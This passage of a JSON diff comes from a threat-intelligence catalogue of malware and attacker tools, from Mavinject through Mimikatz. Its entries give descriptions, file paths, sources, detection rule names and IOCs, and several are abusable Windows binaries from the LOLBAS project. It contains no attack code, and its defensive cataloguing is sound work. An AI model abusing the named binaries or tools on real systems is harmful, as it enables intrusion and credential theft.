}, + { + "description": "[[LOLBAS Mavinject](/references/4ba7fa89-006b-4fbf-aa6c-6775842c97a4)]", + "meta": { + "id": "ea9cd7d1-4a23-47fb-ad52-c4a077b9fe35", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "aa472f81-7673-4545-89f9-1dd43cead4f1", + "type": "similar" + } + ], + "uuid": "e74db115-407d-44dd-906e-2163f2a50e29", + "value": "Mavinject.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by App-v in Windows\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\mavinject.exe\n* C:\\Windows\\SysWOW64\\mavinject.exe\n\n**Resources:**\n* [https://twitter.com/gN3mes1s/status/941315826107510784](https://twitter.com/gN3mes1s/status/941315826107510784)\n* [https://twitter.com/Hexcorn/status/776122138063409152](https://twitter.com/Hexcorn/status/776122138063409152)\n* [https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_mavinject_process_injection.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml)\n* IOC: mavinject.exe should not run unless APP-v is in use on the workstation[[LOLBAS Mavinject](/references/4ba7fa89-006b-4fbf-aa6c-6775842c97a4)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5124", + "source": "Tidal Cyber", + "tags": [ + "724c3509-ad5e-46a3-a72c-6f3807b13793", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "e74db115-407d-44dd-906e-2163f2a50e29", + "type": "similar" + } + ], + "uuid": "aa472f81-7673-4545-89f9-1dd43cead4f1", + "value": "Mavinject" + }, + { + "description": "[Maze](https://app.tidalcyber.com/software/3c206491-45c0-4ff7-9f40-45f9aae4de64) ransomware, previously known as \"ChaCha\", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [Maze](https://app.tidalcyber.com/software/3c206491-45c0-4ff7-9f40-45f9aae4de64) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.[[FireEye Maze May 2020](https://app.tidalcyber.com/references/02338a66-6820-4505-8239-a1f1fcc60d32)][[McAfee Maze March 2020](https://app.tidalcyber.com/references/627a14dd-5300-4f58-869c-0ec91ffb664e)][[Sophos Maze VM September 2020](https://app.tidalcyber.com/references/9c4bbcbb-2c18-453c-8b02-0a0cd512c3f3)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0449", + "source": "MITRE", + "tags": [ + "3c3f9078-5d1e-4c29-a5eb-28f237bbd1ad", + "1cc90752-70a3-4a17-b370-e1473a212f79", + "286918d5-0b48-4655-9118-907b53de0ee0", + "c5c8f954-1bc0-45d5-9a4f-4385d0a720a1", + "ab64f2d8-8da3-48de-ac66-0fd91d634b22", + "5e7433ad-a894-4489-93bc-41e90da90019", + "a2e000da-8181-4327-bacd-32013dbd3654", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fcaadc12-7c17-4946-a9dc-976ed610854c", + "type": "used-by" + }, + { + "dest-uuid": "d9f7383c-95ec-4080-bbce-121c9384457b", + "type": "similar" + } + ], + "uuid": "3c206491-45c0-4ff7-9f40-45f9aae4de64", + "value": "Maze" + }, + { + "description": "[MCMD](https://app.tidalcyber.com/software/939cbe39-5b63-4651-b0c0-85ac39cb9f0e) is a remote access tool that provides remote command shell capability used by [Dragonfly 2.0](https://app.tidalcyber.com/groups/).[[Secureworks MCMD July 2019](https://app.tidalcyber.com/references/f7364cfc-5a3b-4538-80d0-cae65f3c6592)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0500", + "source": "MITRE", + "tags": [], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "used-by" + }, + { + "dest-uuid": "975737f1-b10d-476f-8bda-3ec26ea57172", + "type": "similar" + } + ], + "uuid": "939cbe39-5b63-4651-b0c0-85ac39cb9f0e", + "value": "MCMD" + }, + { + "description": "[MechaFlounder](https://app.tidalcyber.com/software/31cbe3c8-be88-4a4f-891d-04c3bb7ed482) is a python-based remote access tool (RAT) that has been used by [APT39](https://app.tidalcyber.com/groups/a57b52c7-9f64-4ffe-a7c3-0de738fb2af1). The payload uses a combination of actor developed code and code snippets freely available online in development communities.[[Unit 42 MechaFlounder March 2019](https://app.tidalcyber.com/references/2263af27-9c30-4bf6-a204-2f148ebdd17c)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0459", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a57b52c7-9f64-4ffe-a7c3-0de738fb2af1", + "type": "used-by" + }, + { + "dest-uuid": "dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2", + "type": "similar" + } + ], + "uuid": "31cbe3c8-be88-4a4f-891d-04c3bb7ed482", + "value": "MechaFlounder" + }, + { + "description": "MedusaLocker is a ransomware-as-a-service (\"RaaS\") operation that has been active since September 2019. U.S. cybersecurity authorities indicate that MedusaLocker operators have primarily targeted victims in the healthcare sector, among other unspecified sectors. Initial access for MedusaLocker intrusions originally came via phishing and spam email campaigns, but since 2022 has typically occurred via exploit of vulnerable Remote Desktop Protocol devices.[[HC3 Analyst Note MedusaLocker Ransomware February 2023](/references/49e314d6-5324-41e0-8bee-2b3e08d5e12f)]\n\n**Malpedia (Research)**: https://malpedia.caad.fkie.fraunhofer.de/details/win.medusalocker\n\n**Malware Bazaar (Samples & IOCs)**: https://bazaar.abuse.ch/browse/tag/medusalocker/", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5022", + "source": "Tidal Cyber", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "55b20209-c04a-47ab-805d-ace83522ef6a", + "type": "used-by" + } + ], + "uuid": "c9e824b2-554b-4f42-b4c3-48e0a841f589", + "value": "MedusaLocker Ransomware" + }, + { + "description": "[meek](https://app.tidalcyber.com/software/6c3bbcae-3217-43c7-b709-5c54bc7636b1) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0175", + "source": "MITRE", + "tags": [ + "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "65370d0b-3bd4-4653-8cf9-daf56f6be830", + "type": "similar" + } + ], + "uuid": "6c3bbcae-3217-43c7-b709-5c54bc7636b1", + "value": "meek" + }, + { + "description": "[MegaCortex](https://app.tidalcyber.com/software/d8a4a817-2914-47b0-867c-ad8eeb7efd10) is ransomware that first appeared in May 2019. [[IBM MegaCortex](https://app.tidalcyber.com/references/3d70d9b7-88e4-411e-a59a-bc862da965a7)] [MegaCortex](https://app.tidalcyber.com/software/d8a4a817-2914-47b0-867c-ad8eeb7efd10) has mainly targeted industrial organizations. [[FireEye Ransomware Disrupt Industrial Production](https://app.tidalcyber.com/references/9ffa0f35-98e4-4265-8b66-9c805a2b6525)][[FireEye Financial Actors Moving into OT](https://app.tidalcyber.com/references/4bd514b8-1f79-4946-b001-110ce5cf29a9)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0576", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "909617c3-6d87-4330-8f32-bd3af38c3b92", + "type": "similar" + } + ], + "uuid": "d8a4a817-2914-47b0-867c-ad8eeb7efd10", + "value": "MegaCortex" + }, + { + "description": "A legitimate binary that automates syncing between an endpoint and the MEGA Cloud Drive.[[GitHub meganz MEGAsync](/references/6e59c47d-597c-4687-942f-9f1cf1db75d5)] Adversaries are known to abuse the tool for data exfiltration purposes.[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S5005", + "source": "Tidal Cyber", + "tags": [ + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "758c3085-2f79-40a8-ab95-f8a684737927", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "d0f3353c-fbdd-4bd5-8793-a42e1f319b59", + "type": "used-by" + }, + { + "dest-uuid": "3d77fb6c-cfb4-5563-b0be-7aa1ad535337", + "type": "used-by" + }, + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + } + ], + "uuid": "eed908e5-a0b3-473f-bca4-0d3197af2168", + "value": "MEGAsync" + }, + { + "description": "[Melcoz](https://app.tidalcyber.com/software/aa844e6b-feda-4928-8c6d-c59f7be88da0) is a banking trojan family built from the open source tool Remote Access PC. [Melcoz](https://app.tidalcyber.com/software/aa844e6b-feda-4928-8c6d-c59f7be88da0) was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.[[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0530", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d3105fb5-c494-4fd1-a7be-414eab9e0c96", + "type": "similar" + } + ], + "uuid": "aa844e6b-feda-4928-8c6d-c59f7be88da0", + "value": "Melcoz" + }, + { + "description": "[MESSAGETAP](https://app.tidalcyber.com/software/15d7e478-349d-42e6-802d-f16302b98319) is a data mining malware family deployed by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. [[FireEye MESSAGETAP October 2019](https://app.tidalcyber.com/references/f56380e8-3cfa-407c-a493-7f9e50ba3867)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0443", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "9b19d6b4-cfcb-492f-8ca8-8449e7331573", + "type": "similar" + } + ], + "uuid": "15d7e478-349d-42e6-802d-f16302b98319", + "value": "MESSAGETAP" + }, + { + "description": "[metaMain](https://app.tidalcyber.com/software/0a9874bf-4f02-5fab-8ab6-d0f42c6bc71d) is a backdoor used by [Metador](https://app.tidalcyber.com/groups/a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b) to maintain long-term access to compromised machines; it has also been used to decrypt [Mafalda](https://app.tidalcyber.com/software/7506616c-b808-54fb-9982-072a0dcf8a04) into memory.[[SentinelLabs Metador Sept 2022](https://app.tidalcyber.com/references/137474b7-638a-56d7-9ce2-ab906f207175)][[SentinelLabs Metador Technical Appendix Sept 2022](https://app.tidalcyber.com/references/aa021076-e9c5-5428-a938-c10cfb6b7c97)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1059", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "a3a3a1d3-7fe7-5578-8c5f-9c0f2f68079b", + "type": "used-by" + }, + { + "dest-uuid": "df350889-4de9-44e5-8cb3-888b8343e97c", + "type": "similar" + } + ], + "uuid": "0a9874bf-4f02-5fab-8ab6-d0f42c6bc71d", + "value": "metaMain" + }, + { + "description": "[[ESET Casbaneiro Oct 2019](https://app.tidalcyber.com/references/a5cb3ee6-9a0b-4e90-bf32-be7177a858b1)]", + "meta": { + "id": "c2833e32-851b-49d5-98e7-3dc7502ad069" + }, + "related": [ + { + "dest-uuid": "ca607087-25ad-4a91-af83-608646cccbcb", + "type": "similar" + } + ], + "uuid": "10ba04c6-5c6e-4b8e-b855-3d02ce26808b", + "value": "Casbaneiro" + }, + { + "description": "[Metamorfo](https://app.tidalcyber.com/software/ca607087-25ad-4a91-af83-608646cccbcb) is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.[[Medium Metamorfo Apr 2020](https://app.tidalcyber.com/references/356defac-b976-41c1-aac8-5d6ff0c80e28)][[ESET Casbaneiro Oct 2019](https://app.tidalcyber.com/references/a5cb3ee6-9a0b-4e90-bf32-be7177a858b1)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0455", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "81c57a96-fc8c-4f91-af8e-63e24c2927c2", + "type": "similar" + }, + { + "dest-uuid": "10ba04c6-5c6e-4b8e-b855-3d02ce26808b", + "type": "similar" + } + ], + "uuid": "ca607087-25ad-4a91-af83-608646cccbcb", + "value": "Metamorfo" + }, + { + "description": "The Metasploit Framework is an open-source software project that aids in penetration testing.[[Metasploit_Ref](/references/ab6ea6b3-3c71-4e69-9713-dae3e4446083)] The software is often abused by malicious actors to perform a range of post-exploitation activities.", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S5050", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "15787198-6c8b-4f79-bf50-258d55072fee", + "e81ba503-60b0-4b64-8f20-ef93e7783796" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "33159d02-a1ce-49ec-a381-60b069db66f7", + "type": "used-by" + } + ], + "uuid": "8d3b1150-8bb3-49a8-8266-7023e3c5e50a", + "value": "Metasploit" + }, + { + "description": "[Meteor](https://app.tidalcyber.com/software/ee07030e-ff50-404b-ad27-ab999fc1a23a) is a wiper that was used against Iranian government organizations, including Iranian Railways, the Ministry of Roads, and Urban Development systems, in July 2021. [Meteor](https://app.tidalcyber.com/software/ee07030e-ff50-404b-ad27-ab999fc1a23a) is likely a newer version of similar wipers called Stardust and Comet that were reportedly used by a group called \"Indra\" since at least 2019 against private companies in Syria.[[Check Point Meteor Aug 2021](https://app.tidalcyber.com/references/bb79207f-3ab4-4b86-8b1c-d587724efb7c)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0688", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d79e7a60-5de9-448e-a074-f95d2d80f8d0", + "type": "similar" + } + ], + "uuid": "ee07030e-ff50-404b-ad27-ab999fc1a23a", + "value": "Meteor" + }, + { + "description": "[[Mftrace.exe - LOLBAS Project](/references/b6d42cc9-1bf0-4389-8654-90b8d4e7ff49)]", + "meta": { + "id": "3c8563d5-7397-4275-8df1-d365026c3f3f", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "4184f447-6f74-487b-be08-6330a6b78992", + "type": "similar" + } + ], + "uuid": "d9cc6ddb-3c47-45f9-8caf-8124ca55945f", + "value": "Mftrace.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Trace log generation tool for Media Foundation Tools.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x86\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.16299.0\\x64\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x86\n* C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x64\n\n**Resources:**\n* [https://twitter.com/0rbz_/status/988911181422186496](https://twitter.com/0rbz_/status/988911181422186496)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_mftrace.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml)[[Mftrace.exe - LOLBAS Project](/references/b6d42cc9-1bf0-4389-8654-90b8d4e7ff49)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5224", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d9cc6ddb-3c47-45f9-8caf-8124ca55945f", + "type": "similar" + } + ], + "uuid": "4184f447-6f74-487b-be08-6330a6b78992", + "value": "Mftrace" + }, + { + "description": "[Micropsia](https://app.tidalcyber.com/software/5879efc1-f122-43ec-a80d-e25aa449594d) is a remote access tool written in Delphi.[[Talos Micropsia June 2017](https://app.tidalcyber.com/references/c727152c-079a-4ff9-a0e5-face919cf59b)][[Radware Micropsia July 2018](https://app.tidalcyber.com/references/8771ed60-eecb-4e0c-b22c-0c26d30d4dec)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0339", + "source": "MITRE", + "tags": [ + "16b47583-1c54-431f-9f09-759df7b5ddb7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "8c050cea-86e1-4b63-bf21-7af4fa483349", + "type": "similar" + } + ], + "uuid": "5879efc1-f122-43ec-a80d-e25aa449594d", + "value": "Micropsia" + }, + { + "description": "[[Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project](/references/25c46948-a648-4c3c-b442-e700df68fa20)]", + "meta": { + "id": "50c7eb9c-5bc2-4e06-a052-835c2f76ac5c", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "370b00ba-1f91-4375-8a4c-5ca67066f4fd", + "type": "similar" + } + ], + "uuid": "9ddd8ae4-93ff-41ce-b8f2-ac035a25411f", + "value": "Microsoft.NodejsTools.PressAnyKey.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Part of the NodeJS Visual Studio tools.\n\n**Author:** mr.d0x\n\n**Paths:**\n* C:\\Program Files\\Microsoft Visual Studio\\*\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\*\\Community\\Common7\\IDE\\Extensions\\Microsoft\\NodeJsTools\\NodeJsTools\\Microsoft.NodejsTools.PressAnyKey.exe\n\n**Resources:**\n* [https://twitter.com/mrd0x/status/1463526834918854661](https://twitter.com/mrd0x/status/1463526834918854661)\n\n**Detection:**\n* Sigma: [proc_creation_win_renamed_pressanykey.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_renamed_pressanykey.yml)\n* Sigma: [proc_creation_win_pressanykey_lolbin_execution.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml)[[Microsoft.NodejsTools.PressAnyKey.exe - LOLBAS Project](/references/25c46948-a648-4c3c-b442-e700df68fa20)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5225", + "source": "Tidal Cyber", + "tags": [ + "eb75bfce-e0d6-41b3-a3f0-df34e6e9b476", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "9ddd8ae4-93ff-41ce-b8f2-ac035a25411f", + "type": "similar" + } + ], + "uuid": "370b00ba-1f91-4375-8a4c-5ca67066f4fd", + "value": "Microsoft.NodejsTools.PressAnyKey" + }, + { + "description": "[[Microsoft.Workflow.Compiler.exe - LOLBAS Project](/references/1e659b32-a06f-45dc-a1eb-03f1a42c55ef)]", + "meta": { + "id": "9d2ea5e7-8e65-42a3-ad22-451f034e1acc", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "27bd5fc3-17d9-46fa-84ce-c772736512cd", + "type": "similar" + } + ], + "uuid": "26fae087-2715-4a16-8583-ffe1e0040044", + "value": "Microsoft.Workflow.Compiler.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** A utility included with .NET that is capable of compiling and executing C# or VB.net code.\n\n**Author:** Conor Richard\n\n**Paths:**\n* C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe\n\n**Resources:**\n* [https://twitter.com/mattifestation/status/1030445200475185154](https://twitter.com/mattifestation/status/1030445200475185154)\n* [https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb](https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb)\n* [https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1](https://gist.github.com/mattifestation/3e28d391adbd7fe3e0c722a107a25aba#file-workflowcompilerdetectiontests-ps1)\n* [https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1](https://gist.github.com/mattifestation/7ba8fc8f724600a9f525714c9cf767fd#file-createcompilerinputxml-ps1)\n* [https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks](https://www.forcepoint.com/blog/security-labs/using-c-post-powershell-attacks)\n* [https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/](https://www.fortynorthsecurity.com/microsoft-workflow-compiler-exe-veil-and-cobalt-strike/)\n* [https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15](https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_workflow_compiler.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml)\n* Splunk: [suspicious_microsoft_workflow_compiler_usage.yml](https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml)\n* Splunk: [suspicious_microsoft_workflow_compiler_rename.yml](https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)\n* IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.\n* IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe\n* IOC: Presence of \"[[Microsoft.Workflow.Compiler.exe - LOLBAS Project](/references/1e659b32-a06f-45dc-a1eb-03f1a42c55ef)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5125", + "source": "Tidal Cyber", + "tags": [ + "b48e3fa8-25b4-42be-97e7-086068a150c5", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "26fae087-2715-4a16-8583-ffe1e0040044", + "type": "similar" + } + ], + "uuid": "27bd5fc3-17d9-46fa-84ce-c772736512cd", + "value": "Microsoft.Workflow.Compiler" + }, + { + "description": "[[Accenture Lyceum Targets November 2021](https://app.tidalcyber.com/references/127836ce-e459-405d-a75c-32fd5f0ab198)]", + "meta": { + "id": "053eadf6-5b33-45d1-b499-837e43d4a3aa" + }, + "related": [ + { + "dest-uuid": "57545dbc-c72a-409d-a373-bc35e25160cd", + "type": "similar" + } + ], + "uuid": "e94603e8-5352-4ef9-9970-e2ac9ede79b4", + "value": "James" + }, + { + "description": "[Milan](https://app.tidalcyber.com/software/57545dbc-c72a-409d-a373-bc35e25160cd) is a backdoor implant based on [DanBot](https://app.tidalcyber.com/software/131c0eb2-9191-4ccd-a2d6-5f36046a8f2f) that was written in Visual C++ and .NET. [Milan](https://app.tidalcyber.com/software/57545dbc-c72a-409d-a373-bc35e25160cd) has been used by [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) since at least June 2020.[[ClearSky Siamesekitten August 2021](https://app.tidalcyber.com/references/9485efce-8d54-4461-b64e-0d15e31fbf8c)][[Kaspersky Lyceum October 2021](https://app.tidalcyber.com/references/b3d13a82-c24e-4b47-b47a-7221ad449859)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1015", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "used-by" + }, + { + "dest-uuid": "aea6d6b8-d832-4c90-a1bb-f52c6684db6c", + "type": "similar" + }, + { + "dest-uuid": "e94603e8-5352-4ef9-9970-e2ac9ede79b4", + "type": "similar" + } + ], + "uuid": "57545dbc-c72a-409d-a373-bc35e25160cd", + "value": "Milan" + }, + { + "description": "[Mimikatz](https://app.tidalcyber.com/software/b8e7c0b4-49e4-4e8d-9467-b17f305ddf16) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. [[Deply Mimikatz](https://app.tidalcyber.com/references/c92d890c-2839-433a-b458-f663e66e1c63)] [[Adsecurity Mimikatz Guide](https://app.tidalcyber.com/references/b251ed65-a145-4053-9dc2-bf0dad83d76c)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0002", + "source": "MITRE", + "tags": [ + "5fda51b0-dfda-49bd-8615-524b45d4cd44", + "2185ed93-7e1c-4553-9452-c8411b5dca93", + "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "15b77e5c-2285-434d-9719-73c14beba8bd", + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "f2b31240-0b4a-4fa4-82a4-6bb00e146e75", + "type": "used-by" + }, + { + "dest-uuid": "b82c6ed1-c74a-4128-8b4d-18d1e17e1134", + "type": "used-by" + }, + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "ca93af75-0ffa-4df4-b86a-92d4d50e496e", + "type": "used-by" + }, + { + "dest-uuid": "5825a840-5577-4ffc-a08d-3f48d64395cb", + "type": "used-by" + }, + { + "dest-uuid": "dfbce236-735c-436d-b433-933bd6eae17b", + "type": "used-by" + }, + { + "dest-uuid": 